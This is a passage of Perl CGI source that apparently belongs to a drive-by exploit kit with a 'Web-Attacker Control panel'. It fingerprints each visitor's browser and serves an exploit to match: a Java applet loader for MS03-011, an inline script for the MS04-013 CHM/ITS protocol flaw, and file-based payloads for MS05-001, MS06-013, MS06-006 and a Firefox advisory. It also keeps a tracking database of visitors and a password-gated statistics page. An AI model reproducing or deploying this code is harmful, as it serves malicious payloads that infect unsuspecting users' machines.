           dbmopen %Uniques, "$DataBase", 0666;
           unless (exists $Uniques{$UserID})
           {
                 $Uniques{$UserID}="$UserIP;$UserOS;$UserBrowser;0;$ServerTime;$country_name;";
           }
           else
           {
              $ID_used=1;
              $uID_stat=$Uniques{$UserID};
              @StatFields=split(/\;/,$uID_stat);
              $DeltaTime=$ServerTime-$StatFields[4];
              if ($DeltaTime > $BAN_Time)
              {
                 $ID_used=0;
                 $Uniques{$UserID}="$UserIP;$UserOS;$UserBrowser;0;$ServerTime;$country_name;";
              }
           }
           dbmclose %Uniques;
           if ($ID_used==0)
           {
              print redirect("http://$ServerName$SubFolder/demo.php");
           }
           else
           {
              print "Content-Type: text/html\r\n\r\n";
              print "<HTML></HTML>";
           }
   }

   elsif  ($Action=~/bug=/)
   {

       $exp_type=substr($Action,4);

       $ID_used=0;
       dbmopen %Uniques, "$DataBase", 0666;
       if (exists $Uniques{$UserID})
       {
          $ID_used=1;
       }
       dbmclose %Uniques;

       if ($ID_used==1)
       {
          if ($UserBrowser=~/MSIE/)
          {
             if    ($exp_type=~/MS03\-11/)
             {
                 print "Content-Type: text/html\r\n\r\n";
                 print "<HTML><BODY>\r\n";
                 print "<applet archive=\"http://$ServerName$SubFolder/ms0311.jar\" codebase=\"http://$ServerName$SubFolder\" code=\"MagicApplet.class\" width=1  height=1>";
                 print "<param name=\"ModulePath\" value=\"$ScriptURL?exploit=MS03-11\"></applet>\r\n";
                 print "</body></HTML>\r\n";
             }
             elsif ($exp_type=~/MS04\-013/)
             {
                 print "Content-Type: text/html\r\n\r\n";
                 print "<html>\r\n<body>\r\n<script>\r\n";
                 print "var InetPath=\"http://$ServerName$SubFolder\";\r\n";
                 print "CHM_base=\'//ms04013.chm\'\+\'::\'+\'/main.htm';\r\n";
                 print "Protocol=unescape(\"%6ds-i%74s:%6dh%74%6dl:\");\r\n";
                 print "Init_String=Protocol+\'file://\'+\'C:\\\\MAIN.MHT!\'+InetPath+CHM_base;\r\n";
                 print "oMSITS=document.createElement(\"<OBJECT data=\'\"+Init_String+\"\' type=\'text/x-scriptlet\'></OBJECT>\");\r\n";
                 print "document.body.appendChild(oMSITS);\r\n";
                 print "document.title=\"Loaded !\";\r\n";
                 print "</script>\r\n</body>\r\n\</html>\r\n";
             }
             elsif ($exp_type=~/MS05\-001/)
             {
                  if (-e $Exp_MS05001)
                  {
                     $fsize = -s "$Exp_MS05001";
                     open  (F,"$Exp_MS05001");

                     @Text_Lines=<F>;
                     foreach $Text_Line (@Text_Lines)
                     {
                        if ($Text_Line=~/HTA_URL=/)
                        {
                            $Text_Line="HTA_URL=\"http://$ServerName$SubFolder\";\r\n";
                        }
                     }
                     close (F);
                     print "Content-Type: text/html\r\n\r\n";
                     print  @Text_Lines;
                  }
                  else
                  {
                     print "Content-Type: text/html\r\n\r\n";
                     print "Err: can not open the DATA file\r\n";
                  }
             }
             elsif ($exp_type=~/MS06\-013/)
             {
                  if (-e $Exp_MS06013)
                  {
                     $fsize = -s "$Exp_MS06013";
                     open  (F,"$Exp_MS06013");
                     binmode F;
                     read(F,$Panzer,$fsize);
                     close (F);
                     print "Content-Type: text/html\r\n\r\n";
                     binmode STDOUT;
                     print $Panzer;
                  }
                  else
                  {
                     print "Content-Type: text/html\r\n\r\n";
                     print "Err: can not open the DATA file\r\n";
                  }
             }
             else
             {
                 print "Content-Type: text/html\r\n\r\n";
                 print "<HTML></HTML>";
             }
          }
          elsif  ($UserBrowser=~/Firefox/)
          {
                 if ($exp_type=~/MFSA2005\-50/)
                 {
                      if (-e $Exp_MFSA200550)
                      {
                         $fsize = -s "$Exp_MFSA200550";
                         open  (F,"$Exp_MFSA200550");
                         binmode F;
                         read(F,$Panzer,$fsize);
                         close (F);
                         print "Content-Type: text/html\r\n\r\n";
                         binmode STDOUT;
                         print $Panzer;
                      }
                      else
                      {
                         print "Content-Type: text/html\r\n\r\n";
                         print "Err: can not open the DATA file\r\n";
                      }
                 }
                 elsif ($exp_type=~/MS06\-006/)
                 {
                     if (-e $Exp_MS06006)
                     {
                         $fsize = -s "$Exp_MS06006";
                         open  (F,"$Exp_MS06006");
                         binmode F;
                         read(F,$Panzer,$fsize);
                         close (F);
                         print "Content-Type: text/html\r\n\r\n";
                         binmode STDOUT;
                         print $Panzer;
                      }
                      else
                      {
                         print "Content-Type: text/html\r\n\r\n";
                         print "Err: can not open the DATA file\r\n";
                      }
                  }
                  else
                  {
                      print "Content-Type: text/html\r\n\r\n";
                      print "<HTML></HTML>";
                  }
          }
          else
          {
                 print "Content-Type: text/html\r\n\r\n";
                 print "<HTML></HTML>";
          }
       }
       else
       {
                 print "Content-Type: text/html\r\n\r\n";
                 print "<HTML></HTML>";
       }
   }
   else
   {
      print "Content-Type: text/html\r\n\r\n";
      print "<HTML><HEAD><TITLE>Web-Attacker Control panel</TITLE></HEAD>\r\n";
      print "<BODY bgcolor=\"yellow\">\r\n";
      print "<CENTER>\r\n";
      print "Your IP is: $UserIP<BR>\r\n";
      print "Your Browser is: $UserBrowser<BR>\r\n";
      print "Your Operation System is: $UserOS<BR>\r\n";
      print "Current Date and Time: $CurrentTime<BR>\r\n";
      print "<H3>Please enter the password to access the statistics</H3>\r\n";
      print "<FORM action=\"$ScriptURL\">\r\n";
      print "<INPUT type=\"password\" name=\"password\"><BR><BR>\r\n";
      print "<INPUT type=\"submit\" value=\"Enter\">\r\n";
      print "</FORM>\r\n";
      print "</CENTER>\r\n";
      print "</body></HTML>\r\n";
   }

}

sub _crc32 {
    my $comp = shift;
    $poly = 0xEDB88320;
    for (my $cnt = 0; $cnt < 8; $cnt++) { $comp = $comp & 1 ? $poly ^ ($comp >> 1) : $comp >> 1; }
    return $comp;
}

sub strcrc32 {
    my $crc = 0xFFFFFFFF;
    my ($tcmp) = @_;
    foreach (split(//,$tcmp)) { $crc = (($crc>>8) & 0x00FFFFFF) ^_crc32(($crc ^ ord($_)) & 0xFF); }
    return $crc^0xFFFFFFFF;
}